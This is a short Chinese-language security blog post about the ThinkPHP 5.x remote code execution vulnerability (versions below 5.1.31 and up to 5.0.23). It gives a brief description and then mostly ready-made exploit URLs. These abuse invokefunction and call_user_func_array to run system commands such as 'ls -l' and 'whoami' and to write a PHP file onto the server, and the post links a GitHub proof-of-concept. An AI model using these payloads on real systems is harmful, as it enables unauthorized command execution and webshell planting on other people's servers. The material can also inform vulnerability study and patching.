ThinkPHP V5.x 远程代码执行漏洞利用(附POC)

颓废 2019年5月19日09:01:35评论4,454 views字数 729阅读2分25秒阅读模式
摘要

由于ThinkPHP5 框架控制器名 没有进行足够的安全监测,导致在没有开启强制路由的情况下,可以伪装特定的请求可以直接Getshell


漏洞描述:

由于ThinkPHP5 框架控制器名 没有进行足够的安全监测,导致在没有开启强制路由的情况下,可以伪装特定的请求可以直接Getshell

影响范围:v5.x < 5.1.31,<= 5.0.23 

漏洞详情:

本地搭建了一个ThinkPHP5 的环境

https://www.0dayhack.com/public/index.php?s=/index//think/app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l

ThinkPHP V5.x 远程代码执行漏洞利用(附POC)

看看权限

https://www.0dayhack.com/public/index.php?s=/index//think/app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

ThinkPHP V5.x 远程代码执行漏洞利用(附POC)

写个phpinfo

https://www.0dayhack.com/public/index.php?s=/index//think/app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%27<?php%20phpinfo();?>%27%20>%20info.php

ThinkPHP V5.x 远程代码执行漏洞利用(附POC)

查看一下

ThinkPHP V5.x 远程代码执行漏洞利用(附POC)

附上github上的一个poc利用

Dependencies:

pip install -r requirements.txt

ThinkPHP V5.x 远程代码执行漏洞利用(附POC)

给上地址:

https://github.com/heroanswer/thinkphp_rce_poc/

附上自己弄的  有点小鸡肋,就不用放出了

ThinkPHP V5.x 远程代码执行漏洞利用(附POC)

鸡肋ing

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
颓废
  • 本文由 发表于 2019年5月19日09:01:35
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   ThinkPHP V5.x 远程代码执行漏洞利用(附POC)http://cn-sec.com/archives/68048.html

发表评论

匿名网友 填写信息